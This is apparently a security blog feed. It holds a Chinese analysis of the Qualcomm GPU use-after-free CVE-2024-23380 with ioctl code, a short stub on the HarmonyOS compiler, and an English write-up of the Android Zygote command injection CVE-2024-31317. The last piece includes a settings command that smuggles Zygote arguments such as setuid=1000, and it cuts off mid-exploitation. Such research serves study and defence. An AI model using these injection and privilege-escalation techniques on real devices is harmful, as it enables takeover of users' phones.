正常的GPU交互逻辑是app通过加载OpenGL的链接库，在链接库里构造好参数，来和驱动进行ioctl交互。但是一个恶意的攻击者可以直接不加载OpenGL库，直接调用内核态的驱动代码。如果驱动代码中正确处理用户请求，就有可能导致UAF、溢出等内存漏洞。

GPU漏洞回顾

2024年8月，Google的Android Red Team团队披露了一个高通GPU驱动的UAF漏洞CVE-2024-23380，借助这个漏洞，攻击者可以从普通APP的权限提升到系统root。接下来本文对该漏洞的成因、利用过程进行详细分析。

高通GPU驱动提供了一系列接口用于操作GPU的虚拟内存。如IOCTL_KGSL_GPUOBJ_ALLOC用于申请GPU对象（内存），API返回一个id标志，用于区分不同的对象。可以通过IOCTL_KGSL_GPUOBJ_INFO查询到id对应的GPU对象所占居的虚拟内存地址、内存大小等信息。

struct kgsl_gpuobj_alloc param = {
    .size = 0x1000,
    .flags = KGSL_MEMFLAGS_FORCE_32BIT,
};
ret = ioctl(gslfd, IOCTL_KGSL_GPUOBJ_ALLOC, ¶m);
if(ret < 0) {
    printf("alloc failed %d %s\n",errno,strerror(errno));
    return -1;
}
printf("vbo obj size: 0x%llx, flags: 0x%llx mmapsize: 0x%llx id 0x%x\n", param.size, param.flags, param.mmapsize, param.id);
struct kgsl_gpuobj_info info = {
    .id = param.id,
};
ret = ioctl(gslfd, IOCTL_KGSL_GPUOBJ_INFO, &info);
if(ret < 0) {
    printf("get info failed %d %s\n",errno,strerror(errno));
    return -1;
}
uint64_t obj_addr = info.gpuaddr;
printf("obj_addr = 0x%lx\n",obj_addr);

类似地，IOCTL_KGSL_GPUOBJ_FREE用于释放，IOCTL_KGSL_MAP_USER_MEM用于将CPU的虚拟内存映射到GPU虚拟地址，实现内存共享。上述这些内存申请释放操作，实际上驱动的处理逻辑都是在读写GPU的页表，建立或释放从GPU到物理内存页的映射。

除了正常的GPU内存申请操作，IOCTL_KGSL_GPUOBJ_ALLOC还支持一个特殊的flag KGSL_MEMFLAGS_VBO。通过查阅驱动代码发现，带有这个特殊flag的GPU对象在申请时并没有申请对应的物理内存，而是以zero page进行占位填充。

而后又可以通过IOCTL_KGSL_GPUMEM_BIND_RANGES操作将其他GPU对象的内存页映射到自己对应的虚拟地址空间。相反，也有与之对应的KGSL_GPUMEM_RANGE_OP_UNBIND取消映射操作。而这也是本次漏洞的关键所在。

struct kgsl_gpumem_bind_range ranges = {
    .child_offset = 0,
    .target_offset = 0,
    .length = 0x1000,
    .child_id = victim_param.id,
    .op = KGSL_GPUMEM_RANGE_OP_BIND,
};
struct kgsl_gpumem_bind_ranges ranges_args = {
    .ranges = (uint64_t)&ranges,
    .ranges_nents = 1,
    .ranges_size = sizeof(struct kgsl_gpumem_bind_range),
    .id = vbo_param.id,
    .flags = 0,
    .fence_id = 0,
};
ret = ioctl(gslfd, IOCTL_KGSL_GPUMEM_BIND_RANGES, &ranges_args);
if(ret < 0) {
    printf("IOCTL_KGSL_GPUMEM_BIND_RANGES failed %d %s\n",errno,strerror(errno));
    return -1;
}

CVE-2024-23380漏洞分析

内核驱动开发中，一个需要特别注意的点就是并发控制，当读写一些全局变量时，需要对加锁、释放锁的时机格外注意。如下是GPU VBO在进行BIND_RANGES时的处理逻辑，用于将GPU的虚拟内存页VA1映射到另外一块虚拟内存页VA2。操作完成后，VA1和VA2将指向同一块物理内存。

不难看出，上面的操作中 3 和4的顺序被搞反了，正确逻辑应该是先建立好映射后，再释放锁。

BIND_UNRANGES与之相反，加锁、解除VA2和物理页的映射、添加VA2和zero page的映射、释放锁。

漏洞利用

上述的漏洞是由于锁释放的时机不对导致的race，那触发漏洞必定通过多线程并发实现，那竞争成功后又能达到什么样的效果呢？

在GPU中申请分别一个正常的对象、一个带有VBO标记的对象，内存页映射关系如下所示。

当正常VBO对象正常执行BIND_RANGE后，GPU的VA1和VA2会同时指向一块物理内存。如果此时执行UNBIND_RANGE操作,它们又会回到上面的初始状态。

但当race的过程时，如果出现以下的执行过程

在第三步释放VA1后，GPU对应的物理页会被还给系统的内存分配器，然而此时VA2仍保留着到物理内存的映射。导出出现PAGE UAF，我们可以通过控制GPU指令，来实现对该物理内存块的读写。

在实际的代码利用过程中，我们可以频发触发PAGE UAF漏洞，使GPU保留更多的物理地址页映射，方便后续的占位操作。此时GPU映射的物理页虽然处于空闲状态，但是仍保留在kgsl_page_pool这个页管理器中，并没有完全被系统回收，需要Linux内核触发memory shrink后，才会回调_kgsl_pool_shrink，进而将物理页完全交给系统。通过查阅文档得知，正常情况下高权限用户可以通过命令 echo 3> /proc/sys/vm/drop_caches 来触发内存碎片回收，对于一个普通app来说，没有权限修改procfs，可以通过频繁申请内存来触发。

在系统完全回收这些内存后，我们可以再次调用mmap申请内存，这一步是为了让CPU的PTE table占据这些空闲页。接下来，我们通过编写shader程序，去读写这些PTE table对应的GPU VA，进而间接通过改变CPU的虚拟内存映射的物理地址，实现全局物理内存读写。在实验过程中发现，高通处理器系列的kernel虽然开启了KASLR，内核虚拟地址是完全随机化的，但是物理地址却是固定值0xa8000000L。从这个位置开始，我们就可以读写整个内核空间的代码、数据段，进而实现代码提权。

总结

本文简述了移动端GPU安全研究方向、GPU的攻击面梳理、漏洞分析等内容。从攻击者角度来看，纵观过去几年漏洞安全研究历史，传统的内存破坏、整数溢出等漏洞开始淡出历史舞台，这些都可以通过编译期检查、各种sanitizer机制加以缓解，但像mmu misconfiguration等逻辑型漏洞很难通过fuzzer来触达，驱动在运行时更需要硬件支持，这也为自动化漏洞挖掘带来了新的挑战。从防御者角度来看，内核驱动代码的漏洞不可避免，这也不失为当时安卓顶层安全设计的一个失误，既然无法收敛权限，那也许将驱动程序从内核中剥离出来是一种更安全的解决方案，但这更需要SoC厂商更多的技术支持，其中的技术路线选型、架构设计和原始的驱动代码开发不尽相同，涉及到的软件稳定性、兼容性、性能验证等工作量又是一个未知数，仅从安全收益的角度来说似乎很难说服SoC厂商做出这样的改变。如果安卓官方重新定义一种更为安全的HAL层的接口，强制约束厂商的接入方式，理论上是一种更合理的动机，不过这都需要Android官方和SoC厂商迈出艰难的第一步，究竟GPU安全未来的发展如何，我们拭目以待。

参考资料

HarmonyOS NEXT编译器arkcompiler代码阅读初探

2024-11-13T07:22:56.000Z

背景

伴随着HarmonyOS NEXT的发布，华为实现了计算机领域三座大山的跨越：操作系统、处理器、编译器。其中HarmonyOS NEXT的编译器名叫arkcompiler，它的发布引起了编译、安全、程序分析等领域人员的广泛关注，我们阅读了arkcompiler的源码，进行了关键步骤的梳理，并绘制了相关流程图，供大家学习参考，如有错误还望批评指正。

panda字节码格式

arkcompiler编译流程图

The Return of Mystique? Possibly the Most Valuable Userspace Android Vulnerability in Recent Years: CVE-2024-31317

2024-10-21T07:46:32.000Z

Abstract

This article analyzes the cause of CVE-2024-31317, an Android user-mode universal vulnerability, and shares our exploitation research and methods. Through this vulnerability, we can obtain code-execution for any uid, similar to breaking through the Android sandbox to gain permissions for any app. This vulnerability has effects similar to the Mystique vulnerability discovered by the author years ago (which won the Pwnie Award for Best Privilege Escalation Bug), but each has its own merits.

Origin of the Vulnerability

A few months ago, Meta X Red Team published two very interesting Android Framework vulnerabilities that could be used to escalate privileges to any UID. Among them, CVE-2024-0044, due to its simplicity and directness, has already been widely analyzed in the technical community with public exploits available (it’s worth mentioning that people were later surprised to find that the first fix for this vulnerability was actually ineffective). Meanwhile, CVE-2024-31317 still lacks a public detailed analysis and exploit, although the latter has greater power than the former (able to obtain system-uid privileges). This vulnerability is also quite surprising, because it’s already 2024, and we can still find command injection in Android’s core component (Zygote).

This reminds us of the Mystique vulnerability we discovered years ago, which similarly allowed attackers to obtain privileges for any uid. It’s worth noting that both vulnerabilities have certain prerequisites. For example, CVE-2024-31317 requires the WRITE_SECURE_SETTINGS permission. Although this permission is not particularly difficult to obtain, it theoretically still requires an additional vulnerability, as ordinary untrusted_apps cannot obtain this permission (however, it seems that on some branded phones, regular apps may have some methods to directly obtain this permission). ADB shell natively has this permission, and similarly, some special pre-installed signed apps also have this permission.

However, the exploitation effect and universality of this logical vulnerability are still sufficient to make us believe that it is the most valuable Android user-mode vulnerability in recent years since Mystique. Meta’s original article provides an excellent analysis of the cause of this vulnerability, but it only briefly touches on the exploitation process and methods, and is overall rather concise. This article will provide a detailed analysis and introduction to this vulnerability, and introduce some new exploitation methods, which, to our knowledge, are the first of their kind.

Attached is an image demonstrating the exploit effect, successfully obtaining system privilege on major phone brand’s June patch version:

Analysis of this vulnerability

Although the core of this vulnerability is command injection, exploiting it requires a considerable understanding of the Android system, especially how Android’s cornerstone—the Zygote fork mechanism—works, and how it interacts with the system_server.

Zygote and system_server bootstrap process

Every Android developer knows that Zygote forks all processes in Android’s Java world, and system_server is no exception, as shown in the figure below.

The Zygote process actually receives instructions from system_server and spawns child processes based on these instructions. This is implemented through the poll mechanism in ZygoteServer.java:

Runnable runSelectLoop(String abiList) {
//...
if (pollIndex == 0) {
                       // Zygote server socket
                       ZygoteConnection newPeer = acceptCommandPeer(abiList);
                       peers.add(newPeer);
                       socketFDs.add(newPeer.getFileDescriptor());
                   } else if (pollIndex < usapPoolEventFDIndex) {
                       // Session socket accepted from the Zygote server socket

                       try {
                           ZygoteConnection connection = peers.get(pollIndex);
                           boolean multipleForksOK = !isUsapPoolEnabled()
                                   && ZygoteHooks.isIndefiniteThreadSuspensionSafe();
                           final Runnable command =
                                   connection.processCommand(this, multipleForksOK);

                           // TODO (chriswailes): Is this extra check necessary?
                           if (mIsForkChild) {
                               // We're in the child. We should always have a command to run at
                               // this stage if processCommand hasn't called "exec".
                               if (command == null) {
                                   throw new IllegalStateException("command == null");
                               }

                               return command;
                           } else {
                               // We're in the server - we should never have any commands to run.
                               if (command != null) {
                                   throw new IllegalStateException("command != null");
                               }

                               // We don't know whether the remote side of the socket was closed or
                               // not until we attempt to read from it from processCommand. This
                               // shows up as a regular POLLIN event in our regular processing
                               // loop.
                               if (connection.isClosedByPeer()) {
                                   connection.closeSocket();
                                   peers.remove(pollIndex);
                                   socketFDs.remove(pollIndex);
                               }
                           }
                       }
                       
                       //...
     Runnable processCommand(ZygoteServer zygoteServer, boolean multipleOK) {
       ZygoteArguments parsedArgs;

Then it enters the processCommand function, which is the core function for parsing the command buffer and extracting parameters. The specific format is defined in ZygoteArguments, and much of our subsequent work will need to revolve around this format.

    Runnable processCommand(ZygoteServer zygoteServer, boolean multipleOK) {
//...
  try (ZygoteCommandBuffer argBuffer = new ZygoteCommandBuffer(mSocket)) {
            while (true) {
                try {
                    parsedArgs = ZygoteArguments.getInstance(argBuffer);
                    // Keep argBuffer around, since we need it to fork.
                } catch (IOException ex) {
                    throw new IllegalStateException("IOException on command socket", ex);
                }
               //...
                if (parsedArgs.mBootCompleted) {
                    handleBootCompleted();
                    return null;
                }

                if (parsedArgs.mAbiListQuery) {
                    handleAbiListQuery();
                    return null;
                }

                if (parsedArgs.mPidQuery) {
                    handlePidQuery();
                    return null;
                }
//...
                if (parsedArgs.mInvokeWith != null) {
                    try {
                        FileDescriptor[] pipeFds = Os.pipe2(O_CLOEXEC);
                        childPipeFd = pipeFds[1];
                        serverPipeFd = pipeFds[0];
                        Os.fcntlInt(childPipeFd, F_SETFD, 0);
                        fdsToIgnore = new int[]{childPipeFd.getInt$(), serverPipeFd.getInt$()};
                    } catch (ErrnoException errnoEx) {
                        throw new IllegalStateException("Unable to set up pipe for invoke-with",
                                errnoEx);
                    }
                }
//...
        if (parsedArgs.mInvokeWith != null || parsedArgs.mStartChildZygote
                        || !multipleOK || peer.getUid() != Process.SYSTEM_UID) {
                    // Continue using old code for now. TODO: Handle these cases in the other path.
                    pid = Zygote.forkAndSpecialize(parsedArgs.mUid, parsedArgs.mGid,
                            parsedArgs.mGids, parsedArgs.mRuntimeFlags, rlimits,
                            parsedArgs.mMountExternal, parsedArgs.mSeInfo, parsedArgs.mNiceName,
                            fdsToClose, fdsToIgnore, parsedArgs.mStartChildZygote,
                            parsedArgs.mInstructionSet, parsedArgs.mAppDataDir,
                            parsedArgs.mIsTopApp, parsedArgs.mPkgDataInfoList,
                            parsedArgs.mAllowlistedDataInfoList, parsedArgs.mBindMountAppDataDirs,
                            parsedArgs.mBindMountAppStorageDirs,
                            parsedArgs.mBindMountSyspropOverrides);

                    try {
                        if (pid == 0) {
                            // in child
                            zygoteServer.setForkChild();

                            zygoteServer.closeServerSocket();
                            IoUtils.closeQuietly(serverPipeFd);
                            serverPipeFd = null;

                            return handleChildProc(parsedArgs, childPipeFd,
                                    parsedArgs.mStartChildZygote);
                        } else {
                            // In the parent. A pid < 0 indicates a failure and will be handled in
                            // handleParentProc.
                            IoUtils.closeQuietly(childPipeFd);
                            childPipeFd = null;
                            handleParentProc(pid, serverPipeFd);
                            return null;
                        }
                    } finally {
                        IoUtils.closeQuietly(childPipeFd);
                        IoUtils.closeQuietly(serverPipeFd);
                    }
                } else {
                    ZygoteHooks.preFork();
                    Runnable result = Zygote.forkSimpleApps(argBuffer,
                            zygoteServer.getZygoteSocketFileDescriptor(),
                            peer.getUid(), Zygote.minChildUid(peer), parsedArgs.mNiceName);
                    if (result == null) {
                        // parent; we finished some number of forks. Result is Boolean.
                        // We already did the equivalent of handleParentProc().
                        ZygoteHooks.postForkCommon();
                        // argBuffer contains a command not understood by forksimpleApps.
                        continue;
                    } else {
                        // child; result is a Runnable.
                        zygoteServer.setForkChild();
                        return result;
                    }
                }
            }
        }
        //...
        if (parsedArgs.mApiDenylistExemptions != null) {
            return handleApiDenylistExemptions(zygoteServer,
                    parsedArgs.mApiDenylistExemptions);
      }

static @Nullable Runnable forkSimpleApps(@NonNull ZygoteCommandBuffer argBuffer,
                                             @NonNull FileDescriptor zygoteSocket,
                                             int expectedUid,
                                             int minUid,
                                             @Nullable String firstNiceName) {
        boolean in_child =
                argBuffer.forkRepeatedly(zygoteSocket, expectedUid, minUid, firstNiceName);
        if (in_child) {
            return childMain(argBuffer, /*usapPoolSocket=*/null, /*writePipe=*/null);
        } else {
            return null;
        }
  }

boolean forkRepeatedly(FileDescriptor zygoteSocket, int expectedUid, int minUid,
               String firstNiceName) {
try {
    return nativeForkRepeatedly(mNativeBuffer, zygoteSocket.getInt$(),
            expectedUid, minUid, firstNiceName);

This is the top-level entry point for Zygote command processing, but the devil is in the details. After Android 12, Google implemented a fast-path C++ parser in ZygoteCommandBuffer, namely com_android_internal_os_ZygoteCommandBuffer.cpp. The main idea is that Zygote maintains a new inner loop in nativeForkRepeatly outside the outer loop in processCommand, to improve the efficiency of launching apps.

nativeForkRepeatly also polls on the Command Socket and repeatedly processes what is called a SimpleFork format parsed from the byte stream. This SimpleFork actually only processes simple zygote parameters such as runtime-args, setuid, setgid, etc. The discovery of other parameters during the reading process will cause an exit from this loop and return to the outer loop in processCommand, where a new ZygoteCommandBuffer will be constructed, the loop will restart, and unrecognized commands will be read and parsed again in the outer loop.

System_server may send various commands to zygote, not only commands to start processes, but also commands to modify some global environment values, such as denylistexemptions which contains the vulnerable code, which we will explain in more detail later.

As for system_server itself, its startup process is not complicated, as launched by hardcoded parameters in Zygote—obviously because Zygote cannot receive commands from a process that does not yet exist, this is a “chicken or egg” problem, and the solution is to start system_server through hardcoding.

The Zygote command format

The command parameters accepted by Zygote are in a format similar to Length-Value pairs, separated by line breaks, as shown below

8                              [command #1 arg count]
--runtime-args                 [arg #1: vestigial, needed for process spawn]
--setuid=10266                 [arg #2: process UID]
--setgid=10266                 [arg #3: process GID]
--target-sdk-version=31        [args #4-#7: misc app parameters]
--nice-name=com.facebook.orca
--app-data-dir=/data/user/0/com.facebook.orca
--package-name=com.facebook.orca
android.app.ActivityThread     [arg #8: Java entry point]
3                              [command #2 arg count]
--set-api-denylist-exemptions  [arg #1: special argument, don't spawn process]
LClass1;->method1(             [args #2, #3: denylist entries]
LClass1;->field1:

Roughly, the protocol parsing process first reads the number of lines, then reads the content of each line one by one according to the number of lines. However, after Android 12, the exploitation method gets much more complicated due to some buffer pre-reading optimizations, which also led to a significant increase in the length of this article and the difficulty of vulnerability exploitation.

The vulnerability itself

From the previous analysis, we can see that Zygote simply parses the buffer it receives from system_server blindly - without performing any additional secondary checks. This leaves room for command injection: if we can somehow manipulate system_server to write attacker-controlled content into the command socket.

denylistexemptions provides such a method

private void update() {
    String exemptions = Settings.Global.getString(mContext.getContentResolver(),
            Settings.Global.HIDDEN_API_BLACKLIST_EXEMPTIONS);
    if (!TextUtils.equals(exemptions, mExemptionsStr)) {
        mExemptionsStr = exemptions;
        if ("*".equals(exemptions)) {
            mBlacklistDisabled = true;
            mExemptions = Collections.emptyList();
        } else {
            mBlacklistDisabled = false;
            mExemptions = TextUtils.isEmpty(exemptions)
                    ? Collections.emptyList()
                    : Arrays.asList(exemptions.split(","));
        }
        if (!ZYGOTE_PROCESS.setApiDenylistExemptions(mExemptions)) {
          Slog.e(TAG, "Failed to set API blacklist exemptions!");
          // leave mExemptionsStr as is, so we don't try to send the same list again.
          mExemptions = Collections.emptyList();
        }
    }
    mPolicy = getValidEnforcementPolicy(Settings.Global.HIDDEN_API_POLICY);
}

@GuardedBy("mLock")
private boolean maybeSetApiDenylistExemptions(ZygoteState state, boolean sendIfEmpty) {
    if (state == null || state.isClosed()) {
        Slog.e(LOG_TAG, "Can't set API denylist exemptions: no zygote connection");
        return false;
    } else if (!sendIfEmpty && mApiDenylistExemptions.isEmpty()) {
        return true;
    }

    try {
        state.mZygoteOutputWriter.write(Integer.toString(mApiDenylistExemptions.size() + 1));
        state.mZygoteOutputWriter.newLine();
        state.mZygoteOutputWriter.write("--set-api-denylist-exemptions");
        state.mZygoteOutputWriter.newLine();
        for (int i = 0; i < mApiDenylistExemptions.size(); ++i) {
            state.mZygoteOutputWriter.write(mApiDenylistExemptions.get(i));
            state.mZygoteOutputWriter.newLine();
        }
        state.mZygoteOutputWriter.flush();
        int status = state.mZygoteInputStream.readInt();
        if (status != 0) {
            Slog.e(LOG_TAG, "Failed to set API denylist exemptions; status " + status);
        }
        return true;
    } catch (IOException ioe) {
        Slog.e(LOG_TAG, "Failed to set API denylist exemptions", ioe);
        mApiDenylistExemptions = Collections.emptyList();
        return false;
    }
}

“Regardless of the reason why hidden_api_blacklist_exemptions is modified, the ContentObserver’s callback will be triggered. The newly written value will be read and, after parsing (mainly based on splitting the string by commas), directly written into the zygote command socket. A typical command injection.”

Achieving universal exploitation utilizing socket features

Difficulty encountered on Android12 and above

The attacker’s initial idea was to directly inject new commands that would trigger the process startup, as shown below:

settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
3
--runtime-args
--setuid=1000
--setgid=1000
1
--boot-completed"
"

In Android 11 or earlier versions, this type of payload was simple and effective because in these versions, Zygote reads each line directly through Java’s readLine without any buffer implementation affecting it. However, in Android 12, the situation becomes much more complex. Command parsing is now handled by NativeCommandBuffer, introducing a key difference: after the content is examined for once, this parser discards all trailing unrecognized content in the buffer and exits, rather than saving it for the next parsing attempt. This means that injected commands will be directly discarded!

NO_STACK_PROTECTOR
jboolean com_android_internal_os_ZygoteCommandBuffer_nativeForkRepeatedly(
            JNIEnv* env,
            jclass,
            jlong j_buffer,
            jint zygote_socket_fd,
            jint expected_uid,
            jint minUid,
            jstring managed_nice_name) {

 //...
  bool first_time = true;
  do {
    if (credentials.uid != static_cast(expected_uid)) {
      return JNI_FALSE;
    }
    n_buffer->readAllLines(first_time ? fail_fn_1 : fail_fn_n);
    n_buffer->reset();
    int pid = zygote::forkApp(env, /* no pipe FDs */ -1, -1, session_socket_fds,
                              /*args_known=*/ true, /*is_priority_fork=*/ true,
                              /*purge=*/ first_time);
    if (pid == 0) {
      return JNI_TRUE;
    }
//...
    for (;;) {
      // Clear buffer and get count from next command.
      n_buffer->clear();
      //...
      if ((fd_structs[SESSION_IDX].revents & POLLIN) != 0) {
        if (n_buffer->getCount(fail_fn_z) != 0) {
          break;
        }  // else disconnected;
      } else if (poll_res == 0 || (fd_structs[ZYGOTE_IDX].revents & POLLIN) == 0) {
        fail_fn_z(
            CREATE_ERROR("Poll returned with no descriptors ready! Poll returned %d", poll_res));
      }
      // We've now seen either a disconnect or connect request.
      close(session_socket);
   //...
    }
    first_time = false;
  } while (n_buffer->isSimpleForkCommand(minUid, fail_fn_n));
  ALOGW("forkRepeatedly terminated due to non-simple command");
  n_buffer->logState();
  n_buffer->reset();
  return JNI_FALSE;
}

std::optionalchar*, char*>> readLine(FailFn fail_fn) {
    char* result = mBuffer + mNext;
    while (true) {
      // We have scanned up to, but not including mNext for this line's newline.
      if (mNext == mEnd) {
        if (mEnd == MAX_COMMAND_BYTES) {
          return {};
        }
        if (mFd == -1) {
          fail_fn("ZygoteCommandBuffer.readLine attempted to read from mFd -1");
        }
        ssize_t nread = TEMP_FAILURE_RETRY(read(mFd, mBuffer + mEnd, MAX_COMMAND_BYTES - mEnd));
        if (nread <= 0) {
          if (nread == 0) {
            return {};
          }
          fail_fn(CREATE_ERROR("session socket read failed: %s", strerror(errno)));
        } else if (nread == static_cast(MAX_COMMAND_BYTES - mEnd)) {
          // This is pessimistic by one character, but close enough.
          fail_fn("ZygoteCommandBuffer overflowed: command too long");
        }
        mEnd += nread;
      }
      // UTF-8 does not allow newline to occur as part of a multibyte character.
      char* nl = static_cast<char *>(memchr(mBuffer + mNext, '\n', mEnd - mNext));
      if (nl == nullptr) {
        mNext = mEnd;
      } else {
        mNext = nl - mBuffer + 1;
        if (--mLinesLeft < 0) {
          fail_fn("ZygoteCommandBuffer.readLine attempted to read past end of command");
        }
        return std::make_pair(result, nl);
      }
    }
  }

"The nativeForkRepeatedly function operates roughly as follows: After the socket initialization setup is completed, n_buffer->readLines will pre-read and buffer all the lines—i.e., all the content that can currently be read from the socket. The subsequent reset will move the buffer’s current read pointer back to the initial position—meaning the subsequent operations on n_buffer will start parsing this buffer from the beginning, without re-triggering a socket read. After a child process is forked, it will consume this buffer to extract its uid and gid and set them by itself. The parent process will continue execution and enter the for loop below. This for loop continuously listens to the corresponding socket’s file descriptor (fd), receiving and reconstructing incoming connections if they are unexpectedly interrupted.

graph TD    A[Socket Initialization and Setup] --> B[n_buffer->readLines Reads and Buffers All Lines]    B --> C[reset Moves Buffer Pointer Back to Initial Position]    C --> D[n_buffer Re-parses the Buffer]    D --> E{Fork Child Process}    E --> F[Child Process Consumes Buffer to Extract UID and GID]    E --> G[Parent Process Continues Execution]    G --> H[Enters for Loop]    H --> I[n_buffer->clear Clears Buffer]    I --> J[Continuously Listens on Socket FD]    J --> K[Receives and Rebuilds Incoming Connections]    K --> L[n_buffer->getCount]    L --> |Valid Input| O[Check if it is a simpleForkCommand]    L --> |Invalid Input| I    O --> |Is SimpleFork| B    O --> |Not SimpleFork| ZygoteConnection::ProcessCommand

1
2
3

for (;;) {
  // Clear buffer and get count from next command.
  n_buffer->clear();

But this is where things start to get complex and tricky. The call to n_buffer->clear(); discards all the remaining content in the current buffer (the buffer size is 12,200 on Android 12 and HarmonyOS 4, and 32,768 in later versions). This leads to the previously mentioned issue: the injected content will essentially be discarded and will not enter the next round of parsing.

Thus, the core exploitation method here is figuring out how to split the injected content into different reads so that it gets processed. Theoretically, this relies on the Linux kernel’s scheduler. Generally speaking, splitting the content into different write operations on the other side, with a certain time interval between them, can achieve this goal in most cases. Now, let’s take a look back at the vulnerable function in system_server that triggers the writing to the command socket:

private boolean maybeSetApiDenylistExemptions(ZygoteState state, boolean sendIfEmpty) {
    if (state == null || state.isClosed()) {
        Slog.e(LOG_TAG, "Can't set API denylist exemptions: no zygote connection");
        return false;
    } else if (!sendIfEmpty && mApiDenylistExemptions.isEmpty()) {
        return true;
    }

    try {
        state.mZygoteOutputWriter.write(Integer.toString(mApiDenylistExemptions.size() + 1));
        state.mZygoteOutputWriter.newLine();
        state.mZygoteOutputWriter.write("--set-api-denylist-exemptions");
        state.mZygoteOutputWriter.newLine();
        for (int i = 0; i < mApiDenylistExemptions.size(); ++i) {
            state.mZygoteOutputWriter.write(mApiDenylistExemptions.get(i));
            state.mZygoteOutputWriter.newLine();
        }
        state.mZygoteOutputWriter.flush();
        int status = state.mZygoteInputStream.readInt();
        if (status != 0) {
            Slog.e(LOG_TAG, "Failed to set API denylist exemptions; status " + status);
        }
        return true;
    } catch (IOException ioe) {
        Slog.e(LOG_TAG, "Failed to set API denylist exemptions", ioe);
        mApiDenylistExemptions = Collections.emptyList();
        return false;
    }
}

mZygoteOutputWriter, which inherits from BufferedWriter, has a buffer size of 8192.

public void write(int c) throws IOException {
    synchronized (lock) {
        ensureOpen();
        if (nextChar >= nChars)
            flushBuffer();
        cb[nextChar++] = (char) c;
    }
}

This means that unless flush is explicitly called, writes to the socket will only be triggered when the size of accumulated content in the BufferedWriter reaches the defaultCharBufferSize.

It’s important to note that separate writes do not necessarily guarantee separate reads on the receiving side, as the kernel might merge socket operations. The author of Meta proposed a method to mitigate this: inserting a large number of commas to extend the time consumption in the for loop, thereby increasing the time interval between the first socket write and the second socket write (flush). Depending on the device configuration, the number of commas may need to be adjusted, but the overall length must not exceed the maximum size of the CommandBuffer, or it will cause Zygote to abort. The added commas are parsed as empty lines in an array after the string split and will first be written by system_server as a corresponding count, represented by 3001 in the diagram below. However, during Zygote parsing, we must ensure that this count matches the corresponding lines before and after the injection.

Thus, the final payload layout is as shown in the diagram below

Chaining it alltogether

We want the first part of the payload, which is the content before 13 (the yellow section in the diagram below), to exactly reach the 8192-character limit of the BufferedWriter, causing it to trigger a flush and ultimately initiate a socket write.

When Zygote receives this request, it should be in com_android_internal_os_ZygoteCommandBuffer_nativeForkRepeatedly, having just finished processing the previous simpleFork, and blocked at n_buffer->getCount (which is used to read the line count from the buffer). After this request arrives, getline will read all the contents from the socket into the buffer (note: it doesn’t read line by line), and upon reading 3001 (line count), it detects that it is not a isSimpleForkCommand. This causes the function to exit nativeForkRepeatedly and return to the processCommand function in ZygoteConnection.

ZygoteHooks.preFork();
Runnable result = Zygote.forkSimpleApps(argBuffer,
        zygoteServer.getZygoteSocketFileDescriptor(),
        peer.getUid(), Zygote.minChildUid(peer), parsedArgs.mNiceName);
if (result == null) {
    // parent; we finished some number of forks. Result is Boolean.
    // We already did the equivalent of handleParentProc().
    ZygoteHooks.postForkCommon();
    // argBuffer contains a command not understood by forksimpleApps.
    continue;

The whole procedure is as follows:

graph TD;A[Zygote Receives Request] --> B[Enter com_android_internal_os_ZygoteCommandBuffer_nativeForkRepeatedly];B --> C[Finish Processing Previous simpleFork];C --> D[n_buffer->getCount Reads Line Count];D --> E[getline Reads Buffer];E --> F[Reads the 3001 Line Count];F --> G[Detects it is not isSimpleForkCommand];G --> H[Exit nativeForkRepeatedly];H --> I[Return to ZygoteConnection's processCommand Function];

This entire 8192-sized block of content is then passed into ZygoteInit.setApiDenylistExemptions, after which processing of this block is no longer relevant to this vulnerability. Zygote consumes this, and proceed to receive following parts of commands.

At this point, note that we look from the Zygote side back to the system_server side, where system_server is still within the maybeSetApiDenylistExemptions function’s for loop. The 8192 block just processed by Zygote corresponds to the first write in this for loop.

try {
        state.mZygoteOutputWriter.write(Integer.toString(mApiDenylistExemptions.size() + 1));
        state.mZygoteOutputWriter.newLine();
        state.mZygoteOutputWriter.write("--set-api-denylist-exemptions");
        state.mZygoteOutputWriter.newLine();
        for (int i = 0; i < mApiDenylistExemptions.size(); ++i) {
            state.mZygoteOutputWriter.write(mApiDenylistExemptions.get(i)); //<----
            state.mZygoteOutputWriter.newLine();
        }
        state.mZygoteOutputWriter.flush();

The next writer.write will write the core command injection payload, and then the for loop will continue iterating 3000 (or another specified linecount - 1) times. This is done to ensure that consecutive socket writes do not get merged by the kernel into a single write, which could result in Zygote exceeding the buffer size limit and causing Zygote to abort during its read operation.

These iterations accumulated do not exceed the 8192-byte limit of the BufferedWriter, will not trigger an actual socket write within the for loop. Instead, the socket write will only be triggered during the flush. From Zygote’s perspective, it will continue parsing the new buffer in ZygoteArguments.getInstance, corresponding to the section shown in green in the diagram below.

This green section will be read into the buffer in one go. The first thing to be processed is the line count 13, followed by the fully controlled Zygote parameters injected by the attacker.

This time, the ZygoteArguments will only contain the 13 lines from this buffer, while the rest of the buffer (empty lines) will be processed in the next call to ZygoteArguments.getInstance. When the next new ZygoteArguments instance is created, ZygoteCommandBuffer will perform another read, effectively ignoring the remaining empty lines.

What should we do after successfully obtaining control of Zygote parameters?

"After all the complex work outlined above, we have successfully achieved the goal of reliably controlling the Zygote parameters through this vulnerability. However, we still haven’t addressed a critical question: What can be done with these controlled parameters, or how can they be used to escalate privileges?

At first glance, this question seems obvious, but in reality, it requires deeper exploration.

Attempt #1: Can we control Zygote to execute a specific package name with a particular `uid`?

This might be our first thought: Can we achieve this by controlling the --package-name and UID?

Unfortunately, the package name is not of much significance to the attacker or to the entire code loading and execution process. Let’s recall the Android App loading process:

And let’s continue by examining the relevant code inApplicationThread

public static void main(String[] args) {
 //...
     // Find the value for {@link #PROC_START_SEQ_IDENT} if provided on the command line.
     // It will be in the format "seq=114"
     long startSeq = 0;
     if (args != null) {
         for (int i = args.length - 1; i >= 0; --i) {
             if (args[i] != null && args[i].startsWith(PROC_START_SEQ_IDENT)) {
                 startSeq = Long.parseLong(
                         args[i].substring(PROC_START_SEQ_IDENT.length()));
             }
         }
     }
     ActivityThread thread = new ActivityThread();
     thread.attach(false, startSeq);

As we can see, the APK code loading process actually depends on startSeq, a parameter maintained by the ActivityManagerService, which maps ApplicationRecord to startSeq. This mapping tracks the corresponding loadApk, meaning the specific APK file and its path.

So, let’s take a step back:

Method #1: Can we control the execution of arbitrary code under a specific UID?

The answer is yes. By analyzing the parameters in ZygoteArguments, we discovered that the invokeWith parameter can be used to achieve this goal:

public static void execApplication(String invokeWith, String niceName,
        int targetSdkVersion, String instructionSet, FileDescriptor pipeFd,
        String[] args) {
